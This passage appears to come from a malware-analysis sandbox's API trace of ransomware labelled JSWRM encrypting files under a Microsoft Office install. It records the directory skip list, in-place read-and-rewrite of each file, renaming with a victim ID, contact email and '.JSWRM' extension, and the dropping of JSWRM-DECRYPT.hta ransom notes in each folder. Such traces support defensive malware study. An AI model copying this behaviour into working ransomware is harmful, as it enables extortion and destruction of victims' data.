lpWideCharStr="GKWord.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKWord.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GKWord.dll", lpUsedDefaultChar=0x0) returned 10 [0130.511] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2366bd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef8a36d6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef93c032, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x574260, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GRAPH.EXE", cAlternateFileName="")) returned 1 [0130.511] lstrcmpiW (lpString1="GRAPH.EXE", lpString2=".") returned 1 [0130.511] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="..") returned 1 [0130.511] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="...") returned 1 [0130.511] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="windows") returned -1 [0130.511] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="recovery") returned -1 [0130.511] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="perflogs") returned -1 [0130.512] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="documents and settings") returned 1 [0130.512] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="$RECYCLE.BIN") returned 1 [0130.512] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="system volume information") returned -1 [0130.512] lstrcmpiW (lpString1="GRAPH.EXE", lpString2="msocache") returned -1 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.EXE", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH.EXE", lpUsedDefaultChar=0x0) returned 9 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.EXE", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH.EXE", lpUsedDefaultChar=0x0) returned 9 [0130.512] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2661a3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2661a3d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2877b8a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Graph.exe.manifest", cAlternateFileName="GRAPHE~1.MAN")) returned 1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2=".") returned 1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="..") returned 1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="...") returned 1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="windows") returned -1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="recovery") returned -1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="perflogs") returned -1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="documents and settings") returned 1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="$RECYCLE.BIN") returned 1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="system volume information") returned -1 [0130.512] lstrcmpiW (lpString1="Graph.exe.manifest", lpString2="msocache") returned -1 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Graph.exe.manifest", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Graph.exe.manifest", cchWideChar=18, lpMultiByteStr=0x241358, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Graph.exe.manifest", lpUsedDefaultChar=0x0) returned 18 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Graph.exe.manifest", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Graph.exe.manifest", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Graph.exe.manifest", lpUsedDefaultChar=0x0) returned 18 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\graph.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0130.514] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1328) returned 1 [0130.514] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.514] ReadFile (in: hFile=0x45c, lpBuffer=0x21af28, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesRead=0x345ec04*=0x530, lpOverlapped=0x0) returned 1 [0130.515] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.515] WriteFile (in: hFile=0x45c, lpBuffer=0x21af28*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesWritten=0x345ec00*=0x530, lpOverlapped=0x0) returned 1 [0130.515] CloseHandle (hObject=0x45c) returned 1 [0130.516] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\graph.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Graph.exe.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\graph.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.517] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0063153, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GRAPH.ICO", cAlternateFileName="")) returned 1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2=".") returned 1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="..") returned 1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="...") returned 1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="windows") returned -1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="recovery") returned -1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="perflogs") returned -1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="documents and settings") returned 1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="system volume information") returned -1 [0130.517] lstrcmpiW (lpString1="GRAPH.ICO", lpString2="msocache") returned -1 [0130.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.ICO", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.ICO", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\graph.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0130.518] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=766) returned 1 [0130.518] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.518] ReadFile (in: hFile=0x45c, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345ec04*=0x2f0, lpOverlapped=0x0) returned 1 [0130.520] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.520] WriteFile (in: hFile=0x45c, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345ec00*=0x2f0, lpOverlapped=0x0) returned 1 [0130.520] CloseHandle (hObject=0x45c) returned 1 [0130.520] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\graph.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\GRAPH.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\graph.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.521] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Groove", cAlternateFileName="")) returned 1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2=".") returned 1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="..") returned 1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="...") returned 1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="windows") returned -1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="recovery") returned -1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="perflogs") returned -1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="documents and settings") returned 1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="$RECYCLE.BIN") returned 1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="system volume information") returned -1 [0130.521] lstrcmpiW (lpString1="Groove", lpString2="msocache") returned -1 [0130.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\jswrm-decrypt.hta")) returned 0xffffffff [0130.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0130.523] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.523] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0130.524] CloseHandle (hObject=0x45c) returned 1 [0130.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\jswrm-decrypt.hta")) returned 0x20 [0130.525] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231cc0 [0130.525] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.525] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0130.525] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.525] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.525] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17ff3259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x186355ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x186355ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="...") returned 1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="windows") returned -1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="recovery") returned -1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="perflogs") returned -1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="documents and settings") returned -1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="$RECYCLE.BIN") returned 1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="system volume information") returned -1 [0130.525] lstrcmpiW (lpString1="Certificates", lpString2="msocache") returned -1 [0130.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\jswrm-decrypt.hta")) returned 0xffffffff [0130.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0130.527] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.527] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0130.528] CloseHandle (hObject=0x238) returned 1 [0130.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\jswrm-decrypt.hta")) returned 0x20 [0130.528] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17ff3259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x186355ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0130.528] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.528] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17ff3259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x186355ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="..", cAlternateFileName="")) returned 1 [0130.528] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.528] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.528] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="groove.net", cAlternateFileName="")) returned 1 [0130.528] lstrcmpiW (lpString1="groove.net", lpString2=".") returned 1 [0130.528] lstrcmpiW (lpString1="groove.net", lpString2="..") returned 1 [0130.528] lstrcmpiW (lpString1="groove.net", lpString2="...") returned 1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="windows") returned -1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="recovery") returned -1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="perflogs") returned -1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="documents and settings") returned 1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="$RECYCLE.BIN") returned 1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="system volume information") returned -1 [0130.529] lstrcmpiW (lpString1="groove.net", lpString2="msocache") returned -1 [0130.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\jswrm-decrypt.hta")) returned 0xffffffff [0130.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.534] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0130.535] CloseHandle (hObject=0x314) returned 1 [0130.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\jswrm-decrypt.hta")) returned 0x20 [0130.536] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0130.536] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.536] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="..", cAlternateFileName="")) returned 1 [0130.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.536] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18aadbcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18aadbcf, 